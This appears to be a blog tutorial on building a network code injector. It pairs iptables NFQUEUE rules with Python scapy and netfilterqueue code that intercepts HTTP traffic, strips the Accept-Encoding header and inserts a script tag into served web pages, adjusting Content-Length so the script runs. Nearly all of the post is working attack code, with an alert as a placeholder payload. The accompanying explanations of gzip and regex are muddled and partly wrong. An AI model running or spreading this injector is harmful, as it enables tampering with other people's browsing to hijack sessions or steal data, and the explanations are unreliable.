WRITING A CODE INJECTOR

2 min read
0

gzip IS use to compress HTML Encodings

Therefore when the browser sends the response it will first compress the response to a gzip format send it to us!

#IP-table FOR-REMOTE-PC

  • -RUN: iptables -I OUTPUT -j NFQUEUE --queue-num 0
  • -RUN: iptables -I INPUT -j NFQUEUE --queue-num 0


#IP-table FOR-LOCAL-PC
  • -RUN: iptables -I FORWARD -j NFQUEUE --queue-num 0

# CODE: BASE

  1. #!/usr/bin/env python
  2. import netfilterqueue
  3. import scapy.all as scapy


  6. ack_list = []

  8. def set_load(packet, load):
  9.     packet[scapy.Raw].load = load
  10.     del packet[scapy.IP].len
  11.     del packet[scapy.IP].chksum
  12.     del packet[scapy.TCP].chksum
  13.     return packet


  16. def process_packet(packet):
  17.     scapy_packet = scapy.IP(packet.get_payload())

  19.     if scapy_packet.haslayer(scapy.Raw):

  21.         if scapy_packet[scapy.TCP].dport == 80:
  22.              print("[+] Request")
  23.              print(scapy_packet.show())

  25.         elif scapy_packet[scapy.TCP].sport ==80:
  26.             print("[+] Responce")
  27.             print(scapy_packet.show())


  30.     packet.accept()

  32. queue = netfilterqueue.NetfilterQueue()
  33. queue.bind(0, process_packet)
  34. queue.run()

# CODE: MODIFYING TO SEE HTTP

  • WE DO THIS WITH THE HELP OF REGEX [https://pythex.org/]
  • PREVIOUSLY DONE IN MAC CHANGER ALGORITHMS DESIGN



# CODE: injector

  1. #!/usr/bin/env python
  2. import netfilterqueue
  3. import scapy.all as scapy
  4. import re


  7. def set_load(packet, load):
  8.     packet[scapy.Raw].load = load
  9.     del packet[scapy.IP].len
  10.     del packet[scapy.IP].chksum
  11.     del packet[scapy.TCP].chksum
  12.     return packet


  15. def process_packet(packet):
  16.     scapy_packet = scapy.IP(packet.get_payload())

  18.     if scapy_packet.haslayer(scapy.Raw):
  19.         load = scapy_packet[scapy.Raw].load

  21.         if scapy_packet[scapy.TCP].dport == 80:
  22.             print("[+] Request")
  23.             load = re.sub("Accept-Encoding:.*?\\r\\n", "", load)



  27.         elif scapy_packet[scapy.TCP].sport == 80:
  28.             print("[-] Response")
  29.             print(scapy_packet.show())
  30.             injection_code = "<script>alert('hello-senpaii');</script>"
  31.             load = load.replace("</body>", injection_code + "</body>")
  32.             content_length_search = re.search("(?:Content-Length:\s)(\d*)", load)

  34.             if content_length_search and "text/html" in load:
  35.                 content_length = content_length_search.group(1)
  36.                 new_content_length = int(content_length) + len(injection_code)
  37.                 load = load.replace(content_length, str(new_content_length))

  39.             if load != scapy_packet[scapy.Raw].load:
  40.                 new_packet = set_load(scapy_packet, load)
  41.                 packet.set_payload(str(new_packet))

  43.     packet.accept()


  46. queue = netfilterqueue.NetfilterQueue()
  47. queue.bind(0, process_packet)
  48. queue.run()

# THIS IS THE FINAL OUT-PUT

here in code we use regex to convert gzip format to HTML format and injected our desire code that will run during the execution of the code hence for example alert

the issue was with the length it was not executing the alert because

when we inject our code it increase its size SEE IN IMG-

so we targeted the length with the regex and added the length of our desire website + length of written code

new_content_length = int(content_length) + len(injection_code)



4.94 / 169 rates

Post a Comment

If you have any doubts, please let me know

Previous Post Next Post